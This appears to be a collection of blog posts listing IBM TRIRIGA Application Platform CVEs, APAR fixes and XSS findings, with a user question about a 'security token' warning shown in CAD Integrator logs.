Security: IBM TRIRIGA Application Platform vulnerabilities & fixes


[Updated 03.29.17]

For convenience, here are the some recent CVE IDs.

CVE ID Summary APAR
CVE-2016-9737 The IBM TRIRIGA Application Platform is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session.
CVE-2017-1153 The IBM TRIRIGA Report Manager contains a vulnerability that could allow authenticated users to execute actions to which they do not have access.
CVE-2017-1171 The IBM TRIRIGA Application Platform contains a vulnerability that could allow authenticated users to execute application actions to which they do not have access.
CVE-2017-1180 The IBM TRIRIGA Document Manager contains a vulnerability that could allow authenticated users to execute actions to which they do not have access.

[Admin: This post is related to the 05.17.16 post and the 04.04.16 post about vulnerabilities and fixes. To see other related posts, use the Vulnerability tag.]

Continue reading

What is causing the “TRIRIGA security token” warning in CI?


When attempting to make a connection through the CAD Integrator 12.1.3.0 client (with TRIRIGA 10.5/3.5), we are seeing the following error in the security log:

2016-11-18 10:37:55,142 INFO [com.tririga.architecture.security.logger.SecurityLogger] Login Attempt -- To: [/pc/ci/dispatch] Account: [null] From: [10.3.x.xxx] Status: [FAILED]
2016-11-18 10:37:55,705 INFO [com.tririga.architecture.security.logger.SecurityLogger] Login Attempt -- To: [/pc/ci/dispatch] Account: [jackie.lu] From: [10.3.x.xxx] Status: [SUCCESS]
2016-11-18 10:37:55,720 WARN [com.tririga.XSS] XSS potential: Request did not come in with TRIRIGA security token: /pc/ci/dispatch From: 10.3.x.xxx [MID-485378064]

The client fails to establish connection. Any thoughts on what could be causing this? We do not have SSO configured, and the FRONT_END_SERVER setting has been checked.

[Admin: The same question is also posted in the TRIRIGA Around the World Facebook group.]

Continue reading

IV88400: Reflected cross-site scripting (XSS)


Reflected cross-site scripting (XSS) vulnerabilities stem from the data in a request being echoed unsafely into an application’s response. Attackers can construct requests which will cause JavaScript code supplied by the attacker to be executed on the user’s browser and within the context of their current session. This might mean that the attacker would have access to their session tokens, could log their keystrokes, or launch a network scan from the users browser. An attacker may exploit this vulnerability in conjunction with a cross-site request forgery (CSRF) attack, or by providing a maliciously crafted link to a user in an email, chat, or webpage.

The impact of this vulnerability is contingent upon the function of the application. In addition to session hijacking, if the application uses broadly scoped cookies, the vulnerability may lead to widespread account compromise, data loss, and potential theft. A vulnerability of this type might be leveraged in a phishing campaign to exploit the trust and goodwill that users have in Apple in order to perform malicious attacks on the user.

Multiple parameters to “WebProcess.srv” were found to be vulnerable to reflected XSS when the “objectId” and “actionId” parameters are set to “840000” and “750812”, respectively.

Continue reading

IV85103: Cross-site scripting (XSS) vulnerability


Using the trustee account (external.trustee.02) and the image upload functionality within the Maintain User Profile page, it was possible to upload an HTML file containing JavaScript when the file was renamed to JPG.

Here are the direct links to the fix packs in Fix Central:

Moving forward, the vulnerability has been identified and resolved.

Continue reading

Security: IBM TRIRIGA Application Platform vulnerabilities & fixes


[Updated 06.15.16 to add CVE-2016-2883 (2).]

[Updated 06.10.16 to add CVE-2016-2882.]

[Updated 05.31.16 to add CVE-2016-2883 (1).]

For convenience, here are the some recent CVE IDs.

CVE ID Summary APAR
CVE-2016-0362 The IBM TRIRIGA Application Platform allows remote attackers to use one of its web services as a proxy to forward HTTP requests to other internal/external web resources.
CVE-2016-0374 The IBM TRIRIGA Application Platform builder tools are vulnerable to a privilege escalation attack that can result in a user without access having the ability to modify TRIRIGA Applications.
CVE-2016-0386 The IBM TRIRIGA Application Platform is vulnerable to cross-site request forgery (CSRF), caused by improper validation of user-supplied input. By persuading an authenticated user to visit a malicious website, a remote attacker could send a malformed HTTP request. An attacker could exploit this vulnerability to perform cross-site scripting (XSS) attacks, web cache poisoning, and other malicious activities.
CVE-2016-0387 The IBM TRIRIGA Application Platform is vulnerable to cross-site scripting (XSS), caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim’s web browser within the security context of the hosting website, once the URL is clicked. An attacker could use this vulnerability to steal the victim’s cookie-based authentication credentials.
CVE-2016-2882 The IBM TRIRIGA Application Platform could disclose some sensitive server information through URL request responses that could aid an attacker in further attacks against the system.
(1) CVE-2016-2883

(2) CVE-2016-2883

The IBM TRIRIGA Application Platform is vulnerable to cross-site scripting (XSS), caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim’s web browser within the security context of the hosting website, once the URL is clicked. An attacker could use this vulnerability to steal the victim’s cookie-based authentication credentials.

[Admin: This post is related to the 04.04.16 post about vulnerabilities and fixes. To see other related posts, use the Vulnerability tag.]

Continue reading

Security: IBM TRIRIGA Application Platform vulnerabilities & fixes


For convenience, here are the some recent CVE IDs and their related APARs.

CVE ID Summary APAR
CVE-2016-0300 The IBM TRIRIGA Application Platform has a security flaw that could grant unauthenticated access into all JSP pages within the application structure under certain circumstances with the right criteria, which may allow for subsequent probing and exploitation.
CVE-2016-0312 The IBM TRIRIGA Application Platform has a security flaw that grants unauthenticated access to Document Manager in IBM TRIRIGA Application Platform in versions prior to 3.3.2 only. Anyone running on IBM TRIRIGA Application Platform 3.3.2 or higher, is not at impacted by this vulnerability.
CVE-2016-0342 The IBM TRIRIGA Application Platform grants the ability to access to read or modify a report that the user does not have privileges for. IV82437
CVE-2016-0343 IBM TRIRIGA could allow an authenticated user to obtain sensitive information displayed in error messages. IV82433
CVE-2016-0344 The IBM TRIRIGA Application Platform is vulnerable to a cross-site scripting (XSS) attack within My Reports. IV82435
CVE-2016-0345 The IBM TRIRIGA Application Platform no longer discloses server file path information when BIRT reports are rendered. IV82438
CVE-2016-0346 Unauthenticated requests can be made to a vulnerable web application, which then performs unauthorized action on behalf of the attacker. IV82436

[Admin: To see other related posts, use the Vulnerability tag.]

Continue reading